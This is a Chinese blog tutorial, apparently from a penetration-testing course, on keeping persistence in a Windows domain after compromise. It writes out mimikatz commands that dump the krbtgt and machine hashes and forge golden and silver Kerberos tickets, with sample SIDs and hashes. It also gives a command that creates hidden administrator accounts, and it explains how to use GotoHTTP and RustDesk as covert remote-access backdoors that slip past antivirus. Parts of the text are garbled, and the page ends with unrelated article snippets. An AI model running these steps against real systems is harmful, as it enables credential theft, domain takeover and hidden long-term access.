第142天: 内网安全-权限维持黄金白银票据隐藏账户C2 远控RustDeskGotoHTTP

本文主要是介绍第142天: 内网安全-权限维持黄金白银票据隐藏账户C2 远控RustDeskGotoHTTP,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

案例一: 内网域&单机版-权限维持-基于用户-隐藏用户

项目下载地址: GitHub - wgpsec/CreateHiddenAccount: A tool for creating hidden accounts using the registry || 一个使用注册表创建隐藏帐户的工具

用这个工具的话在域中会把它加入administrator组中,在单机环境中的话,不会划入任何组中,所以就会导致没办法删除

域环境

域中首先查看用户

利用工具添加隐藏用户的命令

CreateHiddenAccount_upx_v0.2.exe -u jie -p admin!@#45

这个时候查看用户还是没有增加

利用工具-c命令可以查看隐藏用户

CreateHiddenAccount_upx_v0.2.exe -c

在图形界面当中可以查看到

属于administrator用户组

 

尝试能否利用

利用密码建立ipc连接

点击删除是直接可以删除掉的

单机版

添加用户

查看用户

删除的时候删除不了

案例二: 内网域-权限维持-基于服务 TGT-黄金白银票据

黄金票据

⻩⾦ 票据 成攻击,是 成有效的 TGT Kerberos 票据,并且不受 TGT 命周期的影响 TGT 默认 10 时,最多续订 7 天),这 可以为任意 ⻩⾦ 票据,然后为域管理
TGT ,这样普通 户就可以变成域管理员。

 获取域名和sid

whoami    ##获取本地账户
net time /domain   ##获取域名
whoami /all      ##获取sid:S-1-5-21-1218902331-2157346161-1782232778

获取当前域控是啥

需要获取krbtgt用户的hash,这个好像必须得高权限,但是现在做的是权限维持,你已经拿下了域控,不过是利用域控的身份在普通用户里面创建

privilege::debug
lsadump::lsa /patch /user:krbtgt   ##b097d7ed97495408e1537f706c357fc5

创建黄金票据

mimikatz kerberos::golden /user:随便一个用户 /domain:god.org /sid:用户对应的sid /krbtgt:krbtgt用户的hash /ticket:pjmimikatz kerberos::golden /user:mary /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:pj

把票据导入

kerberos::ptt pj

查看当前的票据

dir查看文件

白银票据

白银票据( SILVER TICKET )是利用域的服务账户进行伪造的 ST ,在 Kerberos 认证
的第三步, Client 带着 ST Authenticator3 Server 上的某个服务进行请求,
Server 接收到 Client 的请求之后,通过自己的 Master Key 解密 ST ,从而获得
Session Key 。所以只需要知道 Server 用户的 Hash 就可以伪造出一个 ST ,且不会经
KDC ,但是伪造的门票只对部分服务起作用(不需要交互 KDC ,需要知道 Server
NTLM Hash )。

 首先获取机器用户的hash

privilege::debug
sekurlsa::logonpasswords  ##946d7b4709666cc91a496aa9e834cba8

 导入白银票据,白银票据只能借助服务运行

kerberos::golden /user:jie /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-GOD /service:cifs /rc4:946d7b4709666cc91a496aa9e834cba8 /pttkerberos::golden /user:xxx用户名 /domain:域名 /sid:域sid /target:目标服务器 /service:目标服务 /rc4:目标服务器的hash  /ptt

cifs的话是文件共享服务,可以访问

案例三:内网域-权限维持-基于软件-GotoHTTP&RustDesk

GotoHTTP

下载地址:https://gotohttp.com/

gotohttp软件,优点无需安装,占用内存小,并且直接通过网页可以访问

上传以后直接执行会生成一个gotohttp.ini文件里面有访问的地址,以及账号密码

缺点是需要网络,但是内网一般是不出网的

该软件需要走的是https协议,会自动帮你解决免杀问题

一般可以利用cs中直接去查看这个文件

可以直接建立连接

RustDesk

这个程序最大的优点就是可以在内网中不用出网建立连接,并且可以绕过一部分杀毒软件

远程版,也就是需要联网,他的登录的id以及密码在下面的文件中

C:\Users\mary.GOD\AppData\Roaming\RustDesk\config\RustDesk.toml

直接输入id号通过密码连接即可

本地版

在下面这个文件中

C:\Users\mary.GOD\AppData\Roaming\RustDesk\config\RustDesk2.toml

加入这段数据

direct-server = 'Y'      ##开启IP连接
direct-access-port = '8443' ##端口   

可以在内网中直接不出网建立连接

成功建立连接

这篇关于第142天: 内网安全-权限维持黄金白银票据隐藏账户C2 远控RustDeskGotoHTTP的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1140691

相关文章

Spring Security 基于表达式的权限控制

前言 spring security 3.0已经可以使用spring el表达式来控制授权,允许在表达式中使用复杂的布尔逻辑来控制访问的权限。 常见的表达式 Spring Security可用表达式对象的基类是SecurityExpressionRoot。 表达式描述hasRole([role])用户拥有制定的角色时返回true (Spring security默认会带有ROLE_前缀),去

客户案例:安全海外中继助力知名家电企业化解海外通邮困境

1、客户背景 广东格兰仕集团有限公司(以下简称“格兰仕”),成立于1978年,是中国家电行业的领军企业之一。作为全球最大的微波炉生产基地,格兰仕拥有多项国际领先的家电制造技术,连续多年位列中国家电出口前列。格兰仕不仅注重业务的全球拓展,更重视业务流程的高效与顺畅,以确保在国际舞台上的竞争力。 2、需求痛点 随着格兰仕全球化战略的深入实施,其海外业务快速增长,电子邮件成为了关键的沟通工具。

安全管理体系化的智慧油站开源了。

AI视频监控平台简介 AI视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。摄像头管理模块用于多种终端设备、智能设备的接入及管理。平台支持包括摄像头等终端感知设备接入,为整个平台提

2024网安周今日开幕,亚信安全亮相30城

2024年国家网络安全宣传周今天在广州拉开帷幕。今年网安周继续以“网络安全为人民,网络安全靠人民”为主题。2024年国家网络安全宣传周涵盖了1场开幕式、1场高峰论坛、5个重要活动、15场分论坛/座谈会/闭门会、6个主题日活动和网络安全“六进”活动。亚信安全出席2024年国家网络安全宣传周开幕式和主论坛,并将通过线下宣讲、创意科普、成果展示等多种形式,让广大民众看得懂、记得住安全知识,同时还

easyui同时验证账户格式和ajax是否存在

accountName: {validator: function (value, param) {if (!/^[a-zA-Z][a-zA-Z0-9_]{3,15}$/i.test(value)) {$.fn.validatebox.defaults.rules.accountName.message = '账户名称不合法(字母开头,允许4-16字节,允许字母数字下划线)';return fal

【Kubernetes】K8s 的安全框架和用户认证

K8s 的安全框架和用户认证 1.Kubernetes 的安全框架1.1 认证:Authentication1.2 鉴权:Authorization1.3 准入控制:Admission Control 2.Kubernetes 的用户认证2.1 Kubernetes 的用户认证方式2.2 配置 Kubernetes 集群使用密码认证 Kubernetes 作为一个分布式的虚拟

企业安全之WiFi篇

很多的公司都没有安全团队,只有运维来负责整个公司的安全,从而安全问题也大打折扣。我最近一直在给各个公司做安全检测,就把自己的心得写下来,有什么不足之处还望补充。 0×01  无线安全 很多的公司都有不怎么注重公司的无线电安全,有钱的公司买设备,没钱的公司搞人力。但是人的技术在好,没有设备的辅助,人力在牛逼也没有个卵用。一个好的路由器、交换机、IDS就像你装备了 无尽、狂徒、杀人书一

恶意PNG:隐藏在图片中的“恶魔”

<img src="https://i-blog.csdnimg.cn/blog_migrate/bffb187dc3546c6c5c6b8aa18b34b962.jpeg" title="214201hhuuhubsuyuukbfy_meitu_1_meitu_2.jpg"/></strong></span><

BT天堂网站挂马事件后续:“大灰狼”远控木马分析及幕后真凶调查

9月初安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序。 鉴于bt天堂电影下载网站访问量巨大,此次挂马事件受害者甚众,安全团队专门针对该木马进行严密监控,并对其幕后真凶进行了深入调查。 一、“大灰狼”的伪装 以下是10月30日一天内大灰狼远控的木马样本截图,可以看到该木马变种数量不

Linux 安全弹出外接磁盘

命令行操作 首先,需要卸载硬盘上的所有分区,可以使用umount来卸载分区 清空系统缓存,将所有的数据写入磁盘 sync 列出已挂载的文件系统 使用lsblk或者df命令来查找要卸载的分区 lsblk or df -h 确保没有文件正在使用 使用lsof 命令来检查 sudo lsof |grep /dev/sdc 卸载分区 假设硬盘的分区是 /dev/sdc1,使用u